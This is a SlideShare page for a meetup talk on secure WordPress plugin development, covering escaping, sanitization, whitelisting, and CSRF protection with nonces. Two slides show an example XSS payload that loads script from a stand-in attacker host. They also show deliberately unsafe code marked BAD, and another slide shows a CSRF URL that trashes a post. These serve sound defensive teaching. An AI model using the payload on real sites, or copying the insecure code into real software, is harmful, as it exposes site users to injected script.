Your SlideShare is downloading. ×
0
So you’re writing code
for the masses, huh?
Are you being responsible and protecting them from
getting pwned?
Watch This.
http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/
That guy pwned a plugin I
wrote live on stage at
WordCamp New York.
It changed my life.
Read This.
http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/
tl;dr
• Keep your dev environment clean
• Escape your data output
• Sanitize your data inputs
• Validate referrers
• Core ...
Keep Your Dev Environment Clean
Don’t think that just because you’re on a mac you’re
safe from viruses.
If you’re on a PC,...
Kaspersky Anti-Virus
• I use it.
• Dre uses it.
• Tony uses it.
• You should be using it.
Trust No One,
Trust Nothing
XSS: Cross-site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web a...
Escape All The Things On Output
http://codex.wordpress.org/Data_Validation#Output_Sanitation
• Bad data will be tamed
• es...
Sanitize All The Things On Input
http://codex.wordpress.org/Data_Validation#Input_Validation
• sanitize_* and similar func...
Whitelisting Data
http://codex.wordpress.org/Data_Validation#Whitelist
• Whitelisting data - Only accept known data
• $_PO...
Blacklisting Data
http://codex.wordpress.org/Data_Validation#Blacklist
• Blacklisting data - Only accept data if it’s in t...
CSRF: Cross-site Request Forgery
Cross-site request forgery, also known as a one-click attack or session
riding and abbrev...
Sweet, this might lead to my
next big deal! ACCEPT!
zOMG WTF?!
http://mysite.com/wp-admin/post.php?post=307&action=trash
Nonces FTW!
(http://codex.wordpress.org/WordPress_Nonces)
• Before the Request
• wp_nonce_url
• wp_create_nonce
• wp_nonce...
Is there an API for that?
Professional WordPress
Plugin Development
http://amzn.to/plugindevbook
Upcoming SlideShare
Loading in...5
×

Secure WordPress Development Practices

2,361

Published on

I gave this talk at the September OCWP developer meetup.

Published in: Technology
2 Comments
3 Likes
Statistics
Notes
No Downloads
Views
Total Views
2,361
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
10
Comments
2
Likes
3
Embeds 0
No embeds

No notes for slide

Transcript of "Secure WordPress Development Practices"

  1. 1. So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?
  2. 2. Watch This. http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/
  3. 3. That guy pwned a plugin I wrote live on stage at WordCamp New York. It changed my life.
  4. 4. Read This. http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/
  5. 5. tl;dr • Keep your dev environment clean • Escape your data output • Sanitize your data inputs • Validate referrers • Core functionality should always trump your super awesome functionality
  6. 6. Keep Your Dev Environment Clean Don’t think that just because you’re on a mac you’re safe from viruses. If you’re on a PC, you should assume you’re already pwned.
  7. 7. Kaspersky Anti-Virus • I use it. • Dre uses it. • Tony uses it. • You should be using it.
  8. 8. Trust No One, Trust Nothing
  9. 9. XSS: Cross-site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. http://en.wikipedia.org/wiki/Cross-site_scripting
  10. 10. Escape All The Things On Output http://codex.wordpress.org/Data_Validation#Output_Sanitation • Bad data will be tamed • esc_{context} • esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings. • esc_html - Escaping for HTML blocks. • esc_attr - Escaping for HTML attributes. • esc_sql - Escapes data for use in a MySQL query. • esc_url - Checks and cleans a URL. • esc_textarea - Escaping for textarea values.
  11. 11. Sanitize All The Things On Input http://codex.wordpress.org/Data_Validation#Input_Validation • sanitize_* and similar functions help for most things • $_POST = array(‘e’=>‘<script src=‘http://pwnd.com/u.js’></script>’) • BAD: update_post_meta($id, ‘e’, $_POST[‘e’]) • GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’])) • Note: Might unintentionally change data and give unexpected results
  12. 12. Whitelisting Data http://codex.wordpress.org/Data_Validation#Whitelist • Whitelisting data - Only accept known data • $_POST = array( ‘pwn’=>‘<script src=‘http://pwnd.com/u.js’></script>’, ‘e’=‘email@domain.com’ ); • BAD: • foreach( $_POST as $key => $val ) : update_post_meta($id, $key, $val); endforeach; • GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
  13. 13. Blacklisting Data http://codex.wordpress.org/Data_Validation#Blacklist • Blacklisting data - Only accept data if it’s in the proper format • $_POST = array( ‘e’=‘me@domain.’ ); • if( is_email($_POST[‘e’]) ) update_post_meta( $id, ‘e’, sanitize_email($_POST[‘e’]) );
  14. 14. CSRF: Cross-site Request Forgery Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. http://en.wikipedia.org/wiki/Cross-site_request_forgery
  15. 15. Sweet, this might lead to my next big deal! ACCEPT!
  16. 16. zOMG WTF?! http://mysite.com/wp-admin/post.php?post=307&action=trash
  17. 17. Nonces FTW! (http://codex.wordpress.org/WordPress_Nonces) • Before the Request • wp_nonce_url • wp_create_nonce • wp_nonce_field • Verify the Request • wp_verify_nonce • check_admin_referer
  18. 18. Is there an API for that?
  19. 19. Professional WordPress Plugin Development http://amzn.to/plugindevbook
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×